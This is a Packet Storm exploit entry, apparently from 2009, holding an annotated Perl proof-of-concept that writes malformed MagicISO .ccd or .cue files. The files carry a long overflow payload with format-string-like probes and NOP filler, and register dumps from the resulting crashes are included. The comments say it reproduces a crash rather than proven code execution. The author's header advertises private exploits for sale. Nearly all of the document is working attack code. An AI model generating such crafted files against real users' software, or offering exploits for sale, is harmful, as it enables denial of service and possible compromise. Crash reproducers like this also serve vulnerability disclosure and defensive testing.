MagicISO Heap Overflow

2009-04-16T00:00:00
ID PACKETSTORM:76758
Type packetstorm
Reporter Stack
Modified 2009-04-16T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#  
# MagicISO CCD/CUE Local Heap Overflow Proof of Concept (crash reproducer)  
# ----------------------------------------------------------------  
# Mountassif Moad   
# Stack ..  
# Cyber-Zone ..   
#  
# Private exploits for Kayako, contact me if anyone want buy it :d  
#  
# WARNING: Author has no responsibility over the damage done  
# Probably impossible to exploit, but who knows? -_-'   
# Register state at the .ccd crash:  
# EAX 44444141  
# ECX 45459090  
# EDX 90904443  
# EBX 4545A094  
# ESP 0012F3A0  
# EBP 0012F3C4  
# ESI 013AE64C  
# EDI 013AF650  
# EIP 005C04CE MagicISO.005C04CE  
# Register state at the .cue crash:  
# EAX 0012F5D4  
# ECX 013B0000  
# EDX 013ADDFC ASCII "FILE "999Ax%N%N%N%N%N%N%N08495d565ef66e7dff9f98764daAAAAAAAAAAAAAA...."  
# EBX 00001241 (low byte of EBX overwritten with 0x41, 'A')  
# ESP 0012F4D8  
# EBP 0012F4E4  
# ESI 00001200  
# EDI 00000000  
# EIP 0047FE91 MagicISO.0047FE91  
# Crash. In both dumps EIP still points into MagicISO's own code, not into attacker-supplied bytes; this reproduces a crash and does not demonstrate control of execution.  
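# Print usage and exit. The single command-line argument is a mode
# selector, not an input path: ".ccd" generates a CloneCD control file,
# ".cue" generates a cue sheet. The original usage text advertised
# ".cpp", which the dispatch below never accepts; corrected to ".ccd".
sub help {
    print "[!] usage : \n perl $0 .ccd \n perl $0 .cue \n ";
    exit();
}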
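# Strictures were missing from the script entirely. Enabling them here
# (lexically, from this point on) catches typos in the long variable
# names below; every name used later is already declared with `my`, and
# bareword filehandles remain legal under strict, so behaviour is unchanged.
use strict;
use warnings;

# No mode selector given: print usage and exit (help() never returns).
help() unless $ARGV[0];

# Mode selector chosen by the user: expected to be '.ccd' or '.cue'.
my $xpl = $ARGV[0];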
# Fixed prefix of the generated CloneCD control file (.ccd). Decoded, the
# escapes are CRLF-separated INI text: "[CloneCD]" Version=3, "[Disc]"
# with TocEntries=4 and Sessions=1, "[Session 1]", then "[Entry 0]" to
# "[Entry 3]" (Point=0xa0, 0xa1, 0xa2 and 0x01 respectively), and finally
# "[TRACK 1]", "MODE=1" and "INDEX 1=999" with NO trailing CRLF -- so the
# bytes appended after this string extend the "INDEX 1" value rather than
# starting a new key. Kept as hex escapes on purpose: the byte sequence
# must stay exact for the crash to reproduce, so do not "tidy" it.
my $header =   
"\x5B\x43\x6C\x6F\x6E\x65\x43\x44\x5D\x0D\x0A\x56\x65\x72\x73\x69".  
"\x6F\x6E\x3D\x33\x0D\x0A\x5B\x44\x69\x73\x63\x5D\x0D\x0A\x54\x6F".  
"\x63\x45\x6E\x74\x72\x69\x65\x73\x3D\x34\x0D\x0A\x53\x65\x73\x73".  
"\x69\x6F\x6E\x73\x3D\x31\x0D\x0A\x44\x61\x74\x61\x54\x72\x61\x63".  
"\x6B\x73\x53\x63\x72\x61\x6D\x62\x6C\x65\x64\x3D\x30\x0D\x0A\x43".  
"\x44\x54\x65\x78\x74\x4C\x65\x6E\x67\x74\x68\x3D\x30\x0D\x0A\x5B".  
"\x53\x65\x73\x73\x69\x6F\x6E\x20\x31\x5D\x0D\x0A\x50\x72\x65\x47".  
"\x61\x70\x4D\x6F\x64\x65\x3D\x31\x0D\x0A\x50\x72\x65\x47\x61\x70".  
"\x53\x75\x62\x43\x3D\x30\x0D\x0A\x5B\x45\x6E\x74\x72\x79\x20\x30".  
"\x5D\x0D\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31\x0D\x0A\x50\x6F".  
"\x69\x6E\x74\x3D\x30\x78\x61\x30\x0D\x0A\x41\x44\x52\x3D\x30\x78".  
"\x30\x31\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D\x30\x78\x30\x34".  
"\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F\x3D\x30\x0D\x0A\x41\x4D\x69".  
"\x6E\x3D\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D\x0A\x41\x46\x72".  
"\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C\x42\x41\x3D\x2D\x31\x35\x30".  
"\x0D\x0A\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D\x69\x6E\x3D\x31".  
"\x0D\x0A\x50\x53\x65\x63\x3D\x30\x0D\x0A\x50\x46\x72\x61\x6D\x65".  
"\x3D\x30\x0D\x0A\x50\x4C\x42\x41\x3D\x34\x33\x35\x30\x0D\x0A\x5B".  
"\x45\x6E\x74\x72\x79\x20\x31\x5D\x0D\x0A\x53\x65\x73\x73\x69\x6F".  
"\x6E\x3D\x31\x0D\x0A\x50\x6F\x69\x6E\x74\x3D\x30\x78\x61\x31\x0D".  
"\x0A\x41\x44\x52\x3D\x30\x78\x30\x31\x0D\x0A\x43\x6F\x6E\x74\x72".  
"\x6F\x6C\x3D\x30\x78\x30\x34\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F".  
"\x3D\x30\x0D\x0A\x41\x4D\x69\x6E\x3D\x30\x0D\x0A\x41\x53\x65\x63".  
"\x3D\x30\x0D\x0A\x41\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C".  
"\x42\x41\x3D\x2D\x31\x35\x30\x0D\x0A\x5A\x65\x72\x6F\x3D\x30\x0D".  
"\x0A\x50\x4D\x69\x6E\x3D\x31\x0D\x0A\x50\x53\x65\x63\x3D\x30\x0D".  
"\x0A\x50\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x50\x4C\x42\x41\x3D".  
"\x34\x33\x35\x30\x0D\x0A\x5B\x45\x6E\x74\x72\x79\x20\x32\x5D\x0D".  
"\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31\x0D\x0A\x50\x6F\x69\x6E".  
"\x74\x3D\x30\x78\x61\x32\x0D\x0A\x41\x44\x52\x3D\x30\x78\x30\x31".  
"\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D\x30\x78\x30\x34\x0D\x0A".  
"\x54\x72\x61\x63\x6B\x4E\x6F\x3D\x30\x0D\x0A\x41\x4D\x69\x6E\x3D".  
"\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D\x0A\x41\x46\x72\x61\x6D".  
"\x65\x3D\x30\x0D\x0A\x41\x4C\x42\x41\x3D\x2D\x31\x35\x30\x0D\x0A".  
"\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D\x69\x6E\x3D\x30\x0D\x0A".  
"\x50\x53\x65\x63\x3D\x32\x0D\x0A\x50\x46\x72\x61\x6D\x65\x3D\x33".  
"\x34\x0D\x0A\x50\x4C\x42\x41\x3D\x33\x34\x0D\x0A\x5B\x45\x6E\x74".  
"\x72\x79\x20\x33\x5D\x0D\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31".  
"\x0D\x0A\x50\x6F\x69\x6E\x74\x3D\x30\x78\x30\x31\x0D\x0A\x41\x44".  
"\x52\x3D\x30\x78\x30\x31\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D".  
"\x30\x78\x30\x34\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F\x3D\x30\x0D".  
"\x0A\x41\x4D\x69\x6E\x3D\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D".  
"\x0A\x41\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C\x42\x41\x3D".  
"\x2D\x31\x35\x30\x0D\x0A\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D".  
"\x69\x6E\x3D\x30\x0D\x0A\x50\x53\x65\x63\x3D\x32\x0D\x0A\x50\x46".  
"\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x50\x4C\x42\x41\x3D\x30\x0D\x0A".  
"\x5B\x54\x52\x41\x43\x4B\x20\x31\x5D\x0D\x0A\x4D\x4F\x44\x45\x3D".  
"\x31\x0D\x0A\x49\x4E\x44\x45\x58\x20\x31\x3D\x39\x39\x39";  
  
  
# Fixed framing of the generated cue sheet, written out as the text it
# decodes to (CRLF line endings, as in the original escapes). $header1
# opens the FILE directive's quoted name; the oversized payload is spliced
# in between by the .cue branch at the bottom of the script, and $header2
# then closes the quote and supplies a minimal one-track layout. This
# matches the EDX dump above, which shows the crash string starting with
# 'FILE "999Ax...'.
my $header1 = 'FILE "';
my $header2 = ".BIN\" BINARY\r\n"
            . " TRACK 01 MODE1/2352\r\n"
            . "   INDEX 01 00:00:00";
  
# 79-byte lead-in placed directly after the last fixed byte of either
# container (for .ccd it continues the "INDEX 1=999" value; for .cue it
# becomes the start of the FILE name). Decoded from the original escapes it
# is "999Ax", eleven "%N" pairs, one lone "%", four more "%N" pairs, "A",
# then a 42-digit hex run. The author only calls it "bypass"; the "%N"
# runs look like format-string probing, but nothing on this page confirms
# what, if anything, they bypass -- treat the bytes as opaque and exact.
my $bypass = '999Ax'
           . ('%N' x 11) . '%' . ('%N' x 4)
           . 'A'
           . 'cfcd208495d565ef66e7dff9f98764dac4ca4238a0';
# Marker and filler segments appended after $bypass, in the order they are
# concatenated below. The register names are the author's labels for where
# each marker showed up in the crash dumps above (e.g. EAX 44444141 and
# ECX 45459090), not anything this script computes. Printable fillers make
# the dump easy to read back; 0x90 is the x86 NOP; 0x91 carries no such
# meaning here and is kept as an opaque byte.
my $edx = 'C' x 4;
my $Bof = 'A' x 4004;
my $eax = 'D' x 4;
my $Nop = "\x90" x 4;
my $ecx = 'E' x 4;
my $Sop = "\x91" x 20;
my $Hof = 'F' x 5000;
  
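# Generate the chosen container in the current directory. Both variants
# carry the same payload; only the fixed framing differs. Fixes versus the
# original: the handle is lexical and three-arg, open/print/close are
# checked so a failed write no longer prints "[!] Done", and the output is
# forced to binary mode -- the framing uses explicit CRLF (\x0D\x0A), and
# on Windows (MagicISO's platform) a text-mode handle would rewrite each
# \x0A as \x0D\x0A and corrupt the file.
# NOTE(review): the register dumps in the header show EIP inside
# MagicISO's own code at the crash, not attacker bytes; this script
# reproduces a crash and does not by itself demonstrate code execution.
if ($xpl eq '.ccd') {
    write_poc('Exploit.ccd',
        $header . $bypass . $edx . $Bof . $eax . $Nop . $ecx . $Sop . $Hof);
}
elsif ($xpl eq '.cue') {
    write_poc('Exploit.cue',
        $header1 . $bypass . $edx . $Bof . $eax . $Nop . $ecx . $Sop . $Hof . $header2);
}
else {
    help();
}

# Write $data to $path as raw bytes, dying on any I/O failure rather than
# silently leaving a missing or truncated file behind.
sub write_poc {
    my ($path, $data) = @_;
    open my $fh, '>', $path or die "open $path: $!";
    binmode $fh;
    print {$fh} $data or die "write $path: $!";
    close $fh or die "close $path: $!";
    print "[!] Done \n";
    return;
}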
  
`